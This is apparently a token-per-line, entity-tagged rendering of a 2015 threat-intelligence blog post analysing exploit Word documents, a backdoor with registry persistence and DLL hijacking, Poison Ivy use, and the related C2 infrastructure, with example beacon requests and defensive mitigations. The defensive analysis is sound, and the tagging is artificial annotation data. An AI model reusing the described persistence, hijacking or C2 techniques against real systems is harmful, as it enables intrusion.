May O
13 O
, O
2015 O
By O
Jon O
Gross(http://blog.cylance.com O
/ O
author O
/ O
jon O
- O
gross O
) O
Share O
This O
. O
 
Attackers O
typically O
shut O
down O
campaigns O
or O
halt O
activity O
after O
they O
are O
exposed O
by O
security O
researchers O
, O
thereby O
creating O
the O
impression O
they O
have O
dropped O
off O
the O
map O
. O
 
This O
often O
leads O
to O
a O
false O
sense O
of O
security O
within O
the O
community O
and O
perpetuates O
the O
idea O
that O
public O
exposure O
makes O
us O
all O
safer O
. O
 
While O
the O
exposed O
activity O
is O
no O
longer O
observed O
, O
attackers O
simply O
continue O
in O
the O
background O
– O
evolving O
or O
altering O
their O
tactics O
to O
seamlessly O
continue O
operations O
with O
increasingly O
advanced O
malware O
. O
 
So O
while O
potentially O
making O
us O
safer O
in O
the O
short O
- O
term O
, O
exposure O
often O
forces O
a O
Darwinian O
evolution O
in O
malware O
. O
 
Several O
months O
ago O
I O
examined O
a O
malware O
- O
tainted O
Word O
document O
titled O
" O
ISIS_twitter_list.doc O
. O
" O
I O
did O
n't O
think O
much O
of O
it O
and O
quickly O
moved O
on O
after O
a O
cursory O
analysis O
. O
 
Yet O
I O
recently O
uncovered O
evidence O
that O
suggests O
it O
was O
the O
work O
of O
a O
well O
- O
known O
Chinese O
threat O
group O
. O
 
This O
group O
is O
known O
to O
have O
targeted O
U.S. O
 
government O
agencies O
, O
defense O
contractors O
, O
aerospace O
firms O
and O
foreign O
militaries O
since O
2009 O
. O
 
Until O
now O
, O
it O
was O
widely O
believed O
the O
actor O
's O
activities O
had O
largely O
subsided O
in O
2013 O
, O
following O
numerous O
public O
disclosures O
and O
detailed O
analyses O
of O
their O
backdoors O
. O
 
Our O
technical O
analysis O
shows O
the O
group O
has O
remained O
active O
. O
 
We O
are O
releasing O
this O
data O
to O
help O
victims O
identify O
and O
remediate O
the O
threat O
. O
 
Click O
here(http://blog.cylance.com O
/ O
spear O
- O
a O
- O
threat O
- O
actor- O
resurfaces#mitigation O
) O
to O
get O
to O
recommended O
mitigations O
, O
or O
for O
all O
the O
technical O
details O
read O
on O
. O
 
It O
all O
began O
with O
the O
MIME O
encoded O
document O
" O
ISIS_twitter_list.doc O
" O
, O
which O
exploited O
the O
familiar O
CVE-2012- O
0158(http://www.cve.mitre.org O
/ O
cgi O
- O
bin O
/ O
cvename.cgi?name O
= O
CVE-2012 O
- O
0158 O
) O
and O
was O
first O
uploaded O
to O
Virustotal O
from O
a O
user O
in O
India O
. O
 
Other O
targets O
identified O
were O
predominantly O
located O
in O
Australia O
, O
New O
Zealand O
, O
Vietnam O
and O
the O
United O
States O
. O
 
File O
Details O
Name O
ISIS_twitter_list.doc O
SHA256 O
6ba1d42c6493b18548e30bd60ca3d07a140d9d1945cf4e2b542e4a6d23913f40 O
File O
Size O
146,338 O
bytes O
The O
first O
stage O
shellcode O
searches O
for O
the O
marker O
" O
GfCv O
" O
then O
checks O
the O
next O
four O
bytes O
are O
" O
EF O
FE O
EC O
CE O
" O
in O
the O
document O
then O
decodes O
the O
second O
stage O
shellcode O
using O
the O
four O
- O
byte O
XOR O
key O
" O
0x29F7C592 O
" O
. O
 
This O
second O
stage O
finds O
and O
decodes O
an O
encoded O
executable O
beginning O
at O
offset O
0x33A2 O
. O
 
The O
binary O
is O
encoded O
using O
a O
variable O
4-byte O
XOR O
key O
that O
is O
generated O
by O
starting O
with O
the O
4-byte O
key O
0x7FFEFC00 O
; O
this O
XOR O
key O
is O
then O
permutated O
every O
four O
bytes O
by O
rotating O
the O
first O
two O
bytes O
of O
the O
key O
by O
0x1 O
and O
shifting O
the O
bits O
of O
the O
next O
two O
bytes O
right O
by O
0x1 O
, O
so O
the O
next O
4-byte O
XOR O
key O
in O
the O
series O
would O
be O
0x3FFF7E00 O
. O
 
It O
includes O
some O
logic O
to O
exclude O
XOR'ng O
any O
bytes O
that O
match O
0x00000000 O
or O
the O
current O
4- O
byte O
XOR O
key O
. O
 
For O
the O
binary O
mathematically O
impaired O
like O
myself O
the O
4-byte O
keys O
will O
eventually O
repeat O
in O
effect O
creating O
a O
256-byte O
XOR O
key O
. O
 
The O
decoded O
binary O
will O
be O
written O
to O
the O
filesystem O
as O
" O
% O
APPDATA%\Microsoft\Systemcertificates\Certificates.ocx O
" O
. O
 
File O
Details O
Full O
File O
Path O
% O
APPDATA%\Microsoft\Systemcertificates\Certificates.ocx O
SHA256 O
9d838fd9d21778ed9dc02226302b486d70ed13d4b3d914a3b512ea07bf67e165 O
File O
Size O
107,008 O
bytes O
Compile O
Time O
2/4/2015 O
8:41:42 O
UTC O
The B-Entity
malware I-Entity
does O
not O
execute O
immediately O
after O
successful O
exploitation O
and O
instead O
just O
creates B-Action
a O
Run B-Entity
key I-Entity
in B-Modifier
the O
current B-Entity
user I-Entity
's I-Entity
hive I-Entity
which O
will O
execute O
the O
next O
time O
the O
victim O
user O
accesses O
the O
system O
. O
 
Registry O
Persistence O
Key O
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Certificates O
Registry O
Key O
Value O
Rundll32.exe O
" O
% O
APPDATA%\Microsoft\SystemCertificates\Certificates.ocx",Setup O
The O
ocx O
file O
is O
actually O
a O
DLL O
and O
provides O
the B-Entity
attacker I-Entity
the O
ability O
to O
upload B-Action
, O
download B-Action
, O
enumerate B-Action
, O
delete B-Action
, O
search B-Action
, O
and O
execute B-Action
files B-Entity
as O
well O
as O
list B-Action
drivers B-Entity
on B-Modifier
the O
system B-Entity
. O
 
The O
binary O
is O
designed O
to O
be O
called O
from O
its O
one O
exported O
function O
, O
" O
Setup O
" O
; O
the O
Run O
key O
will O
ensure O
that O
whenever B-Modifier
the O
victim B-Entity
user I-Entity
logs I-Entity
into I-Entity
the I-Entity
system I-Entity
the O
backdoor B-Entity
will O
execute B-Action
. O
 
The O
binary B-Entity
is O
configured O
to O
communicate B-Action
to B-Modifier
" O
www.microsoftservices.proxydns.com B-Entity
" I-Entity
on B-Modifier
port O
80 B-Entity
using B-Modifier
standard O
HTTP B-Entity
POST I-Entity
and I-Entity
GET I-Entity
requests I-Entity
. O
 
The O
domain O
at O
the O
time O
of O
this O
report O
resolved O
to O
the O
IP O
address O
, O
" O
103.229.125.157 O
" O
. O
 
Additionally O
the O
dynamic O
DNS O
domains O
" O
fighthard.mooo.com O
" O
and O
" O
rampage.freetcp.com O
" O
have O
both O
historically O
resolved O
to O
this O
IP O
address O
. O
 
Example O
initial O
beacon O
request O
. O
 
GET O
/login?wd O
= O
hvJZkcIvKKupNRlsqI0aN6jZDTYPz6ZS9Q- O
H5bCXiER37jqqCDzS3wIUulYOjyKHcDomZCD72mAc4fSCoHhJJ1UQliBkraMepzS5J3UUFUH- O
nofoOgVM02UlCs4LJANIuZH90vM5KH_Ih59DdVRbgQ== O
HTTP/1.1 O
User O
- O
Agent O
: O
Mozilla/4.0 O
( O
compatible O
; O
MSIE O
7.0 O
; O
Windows O
NT O
5.1 O
; O
Trident/4.0 O
; O
.NET O
CLR O
2.0.50727 O
; O
.NET O
CLR O
3.0.4506.2152 O
; O
.NET O
CLR O
3.5.30729 O
; O
.NET O
CLR O
1.1.4322 O
) O
Host O
: O
www.microsoftservices.proxydns.com O
Cache O
- O
Control O
: O
no O
- O
cache O
The O
above O
beacon O
request O
can O
be O
decoded O
by O
base64 O
decoding O
with O
this O
alphabet O
, O
" O
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789- O
_ O
" O
. O
 
Then O
RC4 O
decrypting O
the O
resulting O
string O
using O
the O
first O
four O
bytes O
of O
the O
payload O
as O
the O
decryption O
key O
. O
 
The O
following O
python O
script O
will O
make O
this O
easy O
. O
 
from O
Crypto O
. O
Cipher O
import O
ARC4 O
Decoding O
the O
string O
will O
yield O
the O
following O
. O
 
Where O
k O
: O
is O
a O
unique O
identifier O
for O
the O
victim O
, O
s O
: O
is O
a O
campaign O
identifier O
included O
in O
the O
backdoor O
, O
h O
: O
is O
the O
hostname O
of O
the O
victim O
computer O
, O
u O
: O
is O
the O
victim O
user O
, O
o O
: O
is O
the O
operating O
system O
and O
service O
pack O
level O
, O
and O
m O
is O
the O
mac O
address O
. O
 
Based O
upon O
some O
cursory O
analysis O
the B-Entity
backdoor I-Entity
will O
look B-Action
for I-Action
encrypted O
commands B-Entity
within B-Modifier
HTML O
comments B-Entity
returned I-Entity
from I-Entity
the I-Entity
C2 I-Entity
using O
the O
following O
format O
: O
" O
< O
! O
? O
* O
$ O
@COMMAND O
GOES O
HERE@$ O
* O
? O
! O
> O
;"however O
, O
the O
C2 O
was O
not O
active O
at O
the O
time O
of O
analysis O
so O
this O
could O
not O
be O
confirmed O
. O
 
The O
backdoor B-Entity
may O
also O
make B-Action
requests B-Entity
to B-Modifier
the O
C2 B-Entity
over B-Modifier
HTTP B-Entity
using B-Modifier
the O
following B-Entity
parameters I-Entity
in I-Entity
the I-Entity
URI I-Entity
string I-Entity
" O
query?sid= O
" O
and O
" O
result O
? O
sid= O
" O
. O
 
The O
PDB O
path O
, O
C:\Codes\Eoehttp\Release\Eoehttp.pdb O
, O
was O
also O
left O
in O
the O
backdoor O
although O
no O
other O
instances O
of O
this O
path O
could O
be O
identified O
. O
 
Several O
additional O
exploit O
documents O
were O
identified O
by O
investigating O
the O
domains O
" O
fighthard.mooo.com O
" O
and O
" O
rampage.freetcp.com O
" O
. O
 
Fighthard.mooo.com O
additionally O
resolved O
to O
173.224.214.12 O
in O
February O
of O
2014 O
. O
 
The O
following O
exploit O
documents O
were O
identified O
to O
contain O
a O
payload O
which O
communicated O
to O
this O
domain O
. O
 
Naval O
Science O
Curriculum O
2014.doc O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c O
1.doc O
c593a844a87b3e40346efd5d314c55c5094d5bf191f9bb1aeec8078f6d07c0cd O
Republic O
Day O
speech O
27 O
Jan O
2014.doc O
3219767408bba3fa41b9ab5f964531cf608fb0288684748d6ac0b50cf108c911 O
Rampage.freetcp.com O
still O
resolves O
to O
103.229.125.157 O
as O
of O
4/2/2015 O
Let O
's O
go O
ahead O
and O
take O
a O
look O
further O
into O
one O
of O
the O
other O
expoit O
documents O
, O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c O
. O
 
SHA256 O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c O
Name O
Naval O
Science O
Curriculum O
2014.doc O
File O
Size O
459,087 O
The O
document O
exploits O
old O
faithful O
, O
CVE-2012 O
- O
0158(http://www.cve.mitre.org O
/ O
cgi O
- O
bin O
/ O
cvename.cgi O
? O
name O
= O
CVE-2012 O
- O
0158 O
) O
, O
but O
instead O
of O
using O
a O
MIME O
encoded O
document O
this O
file O
was O
just O
a O
plain O
RTX O
document O
. O
 
Yes O
that O
's O
not O
a O
misspelling O
Word O
is O
happy O
to O
open O
this O
RTF O
format O
as O
well O
. O
 
So O
for O
anyone O
exploring O
and O
hunting O
RTF O
documents O
you O
may O
also O
want O
to O
start O
looking O
for O
the O
" O
{ O
\rtx O
" O
header O
. O
 
We O
'll O
skip O
the O
shellcode O
analysis O
for O
now O
and O
go O
directly O
to O
the O
binary O
which O
is O
stored O
beginning O
at O
offset O
0x1BC27 O
as O
an O
ASCII O
hex O
- O
encoded O
, O
xor O
- O
encoded O
binary O
. O
 
It O
can O
be O
decoded O
using O
the O
XOR O
key O
" O
0xBF O
" O
. O
 
Upon O
successful O
exploitation O
the O
decoded O
binary O
will O
be O
written O
first O
to O
% O
TEMP%\dw20.EXEthen O
copied O
to O
% O
WINDIR%\msascm32.drv O
. O
 
No O
other O
changes O
are O
made O
to O
the O
system O
. O
 
File O
Details O
Full O
File O
Path O
: O
% O
WINDIR%\msacm32.drv O
SHA256 O
: O
67bd81f4c5e129d19ae71077be8b68dc60e16c19019b2c64cdcedca1f43f0ae3 O
File O
Size O
: O
108,544 O
Bytes O
Compile O
Time O
: O
9/26/2013 O
01:46:23 O
UTC O
I O
'm O
always O
curious O
when O
no O
registry O
changes O
are O
made O
in O
the O
exploitation O
process O
. O
 
At O
first O
the O
backdoor O
failed O
to O
load O
or O
really O
do O
anything O
in O
my O
VM O
until O
I O
read O
what O
the O
" O
msascm32.drv O
" O
file O
does O
. O
 
Looking O
at O
the O
original O
file O
's O
( O
% O
WINDIR%\system32\msacm32.drv O
) O
imported O
functions O
, O
it O
's O
clear O
the O
DLL O
is O
responsible O
for O
some O
type O
of O
audio O
processing O
and/or O
playback O
. O
 
A O
quick O
search O
on O
the O
internet O
confirmed O
this O
so O
I O
added O
a O
soundcard O
to O
my O
VM O
. O
 
On B-Modifier
reboot B-Entity
explorer.exe B-Entity
was O
now O
happy O
to O
load B-Action
the O
backdoor B-Entity
and O
get O
down O
to O
business O
; O
this O
technique O
is O
known O
as O
dll O
search O
order O
hijacking O
or O
binary O
planting O
. O
 
Interestingly O
the B-Entity
backdoor I-Entity
will O
also O
load B-Action
the O
legitimate B-Entity
system32\msacm32.drv I-Entity
file I-Entity
resolve O
functions O
and O
pass O
calls O
to O
it O
so O
it O
does O
n't O
break O
audio O
playback O
on O
the O
victim O
system O
. O
 
The O
backdoor B-Entity
contains B-Action
identical O
exports B-Entity
as O
well O
as O
an O
additional B-Entity
dummy I-Entity
function I-Entity
from I-Entity
the I-Entity
legitimate I-Entity
msacm32.drvcalled I-Entity
" I-Entity
StartWork I-Entity
" I-Entity
which O
can O
be O
used O
to O
reliably O
identify O
similar O
samples O
. O
 
The O
backdoor B-Entity
routine I-Entity
exists O
inside O
the O
DllMain O
function O
so O
when O
explorer.exeloads O
the O
backdoor O
via O
LoadLibrary O
it B-Entity
will O
begin O
spawning B-Action
malicious O
threads B-Entity
. O
 
A O
PDB O
path O
was O
also O
left O
in O
this O
binary O
C:\Users\cmd\Desktop\msacm32\Release\msacm32.pdb O
; O
A O
quick O
google O
search O
will O
lead O
you O
to O
a O
YARA O
rule O
written O
by O
Patrick O
Olsen O
and O
the O
very O
similar O
sample O
869fa4dfdbabfabe87d334f85ddda234 O
which O
communicates O
to O
www.micro1.zyns.com O
on O
TCP O
port O
80 O
. O
 
The O
two O
files O
also O
have O
an O
identical O
compilation O
time O
, O
which O
suggests O
the O
backdoor O
is O
probably O
not O
recompiled O
very O
often O
and O
instead O
the O
attacker O
simply O
updates O
the O
callback O
configuration O
information O
. O
 
The O
backdoor O
interestingly O
contains O
the O
well O
known O
Poison O
Ivy O
RAT O
shellcode O
as O
well O
as O
its O
own O
custom O
backdoor O
. O
 
It O
will O
first O
attempt O
to O
communicate O
to O
fighthard.mooo.com O
using O
the O
poison O
ivy O
binary O
protocol O
with O
the O
default O
connection O
password O
of O
" O
admin O
" O
. O
 
The O
Poison O
Ivy O
shellcode O
is O
encrypted O
using O
a O
custom O
cipher O
with O
the O
key O
" O
Tiger324 O
{ O
" O
beginning O
at O
offset O
0xFA5 O
and O
ending O
at O
0x159E. O
 
If O
this O
initial O
connection O
fails O
it O
will O
revert O
to O
the O
secondary O
backdoor O
, O
which O
utilizes O
HTTP O
GET O
and O
POST O
requests O
somewhat O
similar O
to O
the O
ones O
described O
above O
to O
the O
internal O
IP O
address O
" O
192.168.2.26 O
" O
. O
 
This O
suggested O
the O
attacker O
had O
already O
compromised O
other O
systems O
in O
the O
environment O
and O
was O
using O
an O
internal O
C2 O
mechanism O
for O
a O
fallback O
. O
 
Example O
Internal O
Beacon O
. O
 
GET O
/login.asp O
? O
p*hWe8J5pF*k5xv5XeUhIJbKZQfySZRv1NcwhQi2ZHKKvGBC8EjiadbWLoUcgUxJyZElD7AY0DCWmzbIa9IX O
EJ7OZkvwBZVx1JsrhQ== O
HTTP/1.1 O
User O
- O
Agent O
: O
Mozilla/4.0 O
( O
compatible O
; O
MSIE O
8.0 O
; O
Win32 O
) O
Host O
: O
192.168.2.26 O
Requests O
may O
also O
be O
made O
to O
the O
following O
pages O
: O
" O
check.asp O
" O
, O
" O
result.asp O
" O
, O
and O
" O
upload.asp O
" O
. O
 
The O
request O
structure O
is O
slightly O
different O
in O
that O
it O
uses O
the O
base64 O
alphabet O
" O
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 O
+ O
* O
" O
. O
 
The O
resulting O
request O
can O
be O
decoded O
further O
by O
using O
the O
first O
16 O
bytes O
of O
the O
result O
as O
an O
XOR O
key O
to O
decode O
the O
rest O
of O
the O
payload O
. O
 
It O
also O
uses O
a O
static O
User O
- O
Agent O
string O
of O
" O
Mozilla/4.0 O
( O
compatible O
; O
MSIE O
8.0 O
; O
Win32 O
) O
" O
for O
each O
request O
. O
 
The O
following O
script O
simplifies O
this O
process O
. O
 
The O
request O
decodes O
to O
" O
123|000000+|USER O
- O
D6921F6215|Administrator|-1676096002|1.0|0| O
" O
, O
where O
values O
are O
separated O
by O
the O
delimiter O
" O
| O
" O
. O
 
" O
123 O
" O
is O
a O
campaign O
identifier O
hard O
coded O
into O
the O
backdoor O
. O
 
I O
do O
n't O
know O
what O
" O
000000 O
+ O
" O
is O
but O
it O
's O
also O
a O
hard O
coded O
value O
; O
my O
best O
guess O
is O
it O
's O
to O
modify O
the O
timezone O
of O
the O
timestamp O
. O
 
" O
USER O
- O
D6921F6215 O
" O
is O
the O
hostname O
of O
the O
victim O
, O
" O
Administrator O
" O
is O
the O
victim O
user O
, O
" O
1676096002 O
" O
is O
the O
current O
Date O
/ O
Time O
in O
decimal O
, O
and O
" O
1.0 O
" O
is O
a O
version O
number O
also O
stored O
in O
the O
backdoor O
. O
The O
16-byte O
XOR O
key O
will O
be O
randomly O
generated O
per O
each O
request O
. O
 
Results O
from O
commands O
will O
be O
sent O
back O
encoded O
to O
the O
server O
to O
the O
" O
result.asp O
" O
page O
. O
 
The O
backdoor O
will O
accept O
the O
following O
commands O
. O
 
Commands O
with O
a O
? O
appear O
to O
take O
an O
additional O
parameter O
while O
files O
that O
end O
in O
- O
require O
a O
full O
file O
path O
. O
 
The O
backdoor O
is O
also O
capable O
of O
elevating O
its O
privileges O
on O
win7 O
and O
above O
using O
a O
method O
similar O
to O
the O
one O
described O
here O
: O
http://www.pretentiousname.com/misc/win7_uac_whitelist2.html O
. O
 
I O
thought O
it O
was O
interesting O
the O
backdoor O
used O
a O
secondary O
backup O
backdoor O
in O
addition O
to O
its O
primary O
payload O
. O
 
The O
first O
communicated O
directly O
outside O
the O
network O
using O
a O
well O
known O
RAT O
protocol O
and O
if O
that O
failed O
the O
secondary O
much O
stealthier O
backdoor O
communicated O
to O
an O
internal O
C2 O
address O
using O
it O
's O
own O
custom O
encoded O
HTTP O
based O
protocol O
. O
 
The O
use O
of O
a O
relatively O
undisclosed O
DLL O
search O
order O
hijack O
also O
made O
this O
sample O
unique O
. O
 
Detection O
rates O
for O
this O
binary O
seem O
to O
be O
pretty O
good O
right O
now O
39/57 O
; O
however O
, O
at O
the O
time O
it O
was O
first O
used O
in O
late O
January O
2014 O
detection O
rates O
were O
much O
poorer O
. O
 
Other O
samples O
from O
the O
identified O
exploit O
documents O
were O
similar O
to O
the O
one O
described O
above O
with O
different O
network O
callbacks O
. O
 
And O
now O
to O
tie O
all O
this O
back O
to O
the O
" O
well O
- O
known O
" O
threat O
group O
. O
 
The O
" O
173.224.214.12 O
" O
IP O
address O
that O
" O
fighthard.mooo.com O
" O
previously O
resolved O
to O
also O
historically O
had O
two O
other O
domains O
point O
to O
it O
" O
queenberry.www1.biz O
" O
and O
" O
word.crabdance.com O
" O
. O
 
" O
word.crabdance.com O
" O
previously O
resolved O
to O
" O
64.71.162.70 O
" O
on O
September O
8 O
, O
2012 O
and O
108.171.246.140 O
on O
February O
19 O
, O
2014 O
. O
 
The O
" O
64.71.162.70 O
" O
address O
and O
the O
associated O
domain O
" O
www.ollay011.zyns.com O
" O
are O
rather O
infamous O
and O
the O
first O
mention O
of O
it O
I O
could O
find O
is O
in O
this O
shadowserver O
post O
: O
http://blog.shadowserver.org/2012/04/16/beware O
- O
of O
- O
what O
- O
you- O
download O
- O
recent O
- O
purported O
- O
ceiec O
- O
document O
- O
dump O
- O
booby O
- O
trapped/ O
related O
to O
exploit O
documents O
identified O
in O
a O
data O
dump O
from O
Hardcore O
Charlie O
. O
 
If O
you O
follow O
the O
rabbit O
hole O
deep O
enough O
you O
can O
eventually O
trace O
samples O
via O
domain O
and O
IP O
address O
crossover O
back O
to O
the O
FBI O
flash O
# O
A-000009-MW O
from O
mid O
2013 O
. O
 
Additional O
domains O
and O
IP O
addresses O
related O
to O
this O
group O
are O
included O
in O
the O
appendix O
. O
 
While O
defending O
against O
the O
constant O
stream O
of O
new O
malware O
from O
advanced O
threat O
groups O
may O
be O
difficult O
, O
organizations O
can O
take O
some O
relatively O
easy O
steps O
to O
help O
identify O
intrusions O
. O
 
This O
group O
is O
among O
the O
numerous O
threat O
actors O
who O
rely O
almost O
exclusively O
on O
Dynamic O
DNS O
infrastructure O
. O
 
They O
seem O
to O
prefer O
ChangeIP O
( O
https://www.changeip.com O
/ O
services O
/ O
free O
- O
dynamic O
- O
dns/(https://www.changeip.com O
/ O
services O
/ O
free- O
dynamic O
- O
dns/ O
) O
) O
and O
Afraid O
( O
https://freedns.afraid.org/(https://freedns.afraid.org/ O
) O
) O
for O
free O
DNS O
services O
, O
although O
they O
previously O
heavily O
used O
Sitelutions O
( O
https://sitelutions.com/info/sldns(https://sitelutions.com/info/sldns O
) O
) O
. O
 
While O
there O
are O
some O
legitimate O
instances O
of O
dynamic O
DNS O
in O
corporate O
environments O
, O
it O
only O
accounts O
for O
a O
small O
percentage O
of O
traffic O
. O
 
Monitoring O
and/or O
blocking O
dynamic O
DNS O
requests O
should O
help O
detect O
attacks O
by O
this O
actor O
. O
 
Any O
dynamic O
DNS O
domains O
that O
resolve O
to O
non O
- O
routable O
IP O
addresses O
, O
like O
127.0.0.1 O
or O
private O
IP O
addresses O
, O
should O
be O
thoroughly O
investigated O
. O
 
The O
HTTP O
traffic O
generated O
by O
both O
samples O
uses O
a O
limited O
number O
of O
header O
fields O
, O
which O
is O
substantially O
different O
from O
the O
majority O
of O
traffic O
generated O
by O
modern O
browsers O
. O
 
As O
always O
, O
do O
n't O
open O
E O
- O
mail O
attachments O
from O
untrusted O
parties O
. O
 
Tags O
: O
CylanceSPEAR(http://blog.cylance.com O
/ O
topic O
/ O
cylancespear O
) O
Back O
to O
Blog(http://blog.cylance.com O
) O
 
